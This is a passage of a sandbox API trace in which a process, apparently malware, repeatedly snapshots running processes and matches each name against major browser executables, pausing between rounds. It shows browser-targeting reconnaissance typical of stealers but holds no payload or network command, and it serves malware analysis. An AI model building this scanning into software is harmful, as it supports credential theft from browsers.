[0172.409] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0172.409] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0172.409] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0172.409] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.409] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0172.410] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0172.410] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0172.410] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0172.410] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0172.410] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.410] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0172.410] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0172.410] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0172.410] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0172.410] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0172.410] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.410] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0172.411] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0172.411] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0172.411] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0172.411] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0172.411] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.411] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0172.412] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0172.412] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0172.412] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0172.412] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0172.412] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.412] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0172.412] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0172.412] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0172.412] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0172.412] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0172.412] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.412] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0172.413] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0172.413] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0172.413] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0172.413] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0172.413] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.413] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0172.413] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0172.414] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0172.414] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0172.414] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0172.414] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0172.414] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0172.414] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0172.414] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0172.414] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0172.414] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0172.415] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0172.415] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0172.415] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0172.415] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0172.415] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.415] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0172.415] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0172.415] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0172.415] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0172.415] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0172.415] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.415] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0172.416] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0172.416] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0172.416] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0172.416] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0172.416] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0172.416] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0172.417] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0172.417] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0172.417] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0172.417] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.417] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.417] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.417] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.417] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0172.417] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0172.418] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0172.418] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0172.418] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0172.418] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0172.418] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.418] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.418] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.418] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.418] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.418] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0172.418] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0172.419] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0172.419] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0172.419] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0172.419] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0172.419] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.502] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.502] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.502] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.502] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0172.502] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.502] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.503] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0172.503] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0172.503] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0172.503] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0172.503] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.503] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0172.503] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0172.503] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0172.503] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0172.504] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0172.504] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.504] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0172.504] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0172.504] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0172.504] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0172.504] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0172.504] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.504] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.505] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0172.505] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0172.505] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0172.505] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0172.505] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.505] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.505] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0172.505] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0172.505] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0172.505] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0172.505] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.506] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.506] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0172.506] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0172.506] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0172.506] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0172.506] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.506] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.507] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0172.507] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0172.507] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0172.507] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0172.507] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.507] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0172.507] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0172.507] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0172.507] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0172.507] lstrcmpiA (lpString1="regsvr32.exe", lpString2="opera.exe") returned 1 [0172.507] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.507] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0172.508] CloseHandle (hObject=0xe8) returned 1 [0172.508] Sleep (dwMilliseconds=0x3e8) [0173.553] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0173.554] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.555] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0173.555] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0173.555] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0173.555] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0173.555] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0173.555] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0173.555] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0173.556] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0173.556] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0173.556] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0173.556] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0173.556] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0173.556] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0173.556] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0173.556] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0173.556] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0173.556] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.556] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.557] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0173.557] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0173.557] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0173.557] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0173.557] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.557] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0173.557] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0173.557] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0173.557] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0173.557] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0173.557] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.557] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.558] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0173.558] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0173.558] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0173.558] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0173.558] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.558] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0173.559] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0173.559] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0173.559] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0173.559] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0173.559] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.559] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0173.559] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0173.560] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0173.560] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0173.560] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0173.560] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.560] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0173.560] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0173.560] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0173.560] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0173.560] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0173.560] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.560] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0173.561] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0173.561] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0173.561] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0173.561] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0173.561] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.561] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.561] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.561] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.561] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 